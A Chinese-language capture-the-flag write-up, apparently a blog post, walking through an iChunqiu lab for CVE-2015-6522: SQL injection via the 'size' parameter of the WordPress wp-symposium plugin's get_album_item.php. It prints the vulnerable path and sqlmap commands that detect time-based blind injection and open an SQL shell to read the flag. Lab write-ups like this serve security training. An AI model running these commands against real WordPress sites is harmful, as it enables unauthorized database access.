春秋云境CVE-2015-6522

1.阅读靶场介绍

这里给出了路径是wp-symposium/get_album_item.php

涉及的参数是size

用到的方法是sql注入

这样看来思路很清晰了,直接进入靶场吧

2.启动靶场

进入靶场后如下图所示

这里博主也提一下自己打靶场的一个春秋云境的经验

凡是遇到wordpress这类型的靶场

我们都是默认/wp-content/plugins/在前面加上这两个路径哟

好了,接下来进入poc环节了

3.poc

我们直接访问这个url

https://eci-2ze90texnn2capjdyr1p.cloudeci1.ichunqiu.com:80/wp-content/plugins/wp-symposium/get_album_item.php?size=1

会出现如下图所示的页面

这里我们直接启动sqlmap

首先我们执行的是这个命令

sqlmap.py -u https://eci-2ze90texnn2capjdyr1p.cloudeci1.ichunqiu.com:80/wp-content/plugins/wp-symposium/get_album_item.php?size=1 --batch

看看会不会出现SQL注入的方法

结果是:

存在时间盲注的方式

接下来就是

执行这个语句

sqlmap.py -u https://eci-2ze90texnn2capjdyr1p.cloudeci1.ichunqiu.com:80/wp-content/plugins/wp-symposium/get_album_item.php?size=1 --batch --sql-shell

最后我们会得到发现可以进入界面

然后在执行这个命令

select flag from flag

稍等片刻以后就可以找到flag了

文章到此结束,恭喜各位又攻克一个靶场

期待博主出什么春秋云景教学的请留言哟

感谢各位宝贵的时间

相关推荐
tntxia8 小时前
网络安全漏洞修复(一)
安全
泯泷2 天前
第 2 篇:设计第一套字节码:Opcode、Instruction 与 Constant Pool
前端·javascript·安全
泯泷2 天前
第 1 篇:从 1 + 2 开始:亲手写出第一台 JSVM
前端·javascript·安全
Flynt6 天前
npm v12 来了:allowScripts 默认关闭,我的项目差点跑不起来
安全·npm·node.js
冬奇Lab11 天前
Skill 系列(02):Skill 安全风险——三类攻击面的实战测试
人工智能·安全·开源
Aphasia31114 天前
VPN 与内网穿透
安全
Mr_愚人派15 天前
当"Claude"不再是 Claude:一次第三方 API 代理引发的 AI 身份伪造排查实录
人工智能·安全
DaLi Yao16 天前
【无标题】
人工智能·安全
Alsn8616 天前
等待学习-学习目录:Docker 容器安全攻防
学习·安全·docker
网络研究院16 天前
2026年网络安全
网络·安全·法律·法规·趋势·发展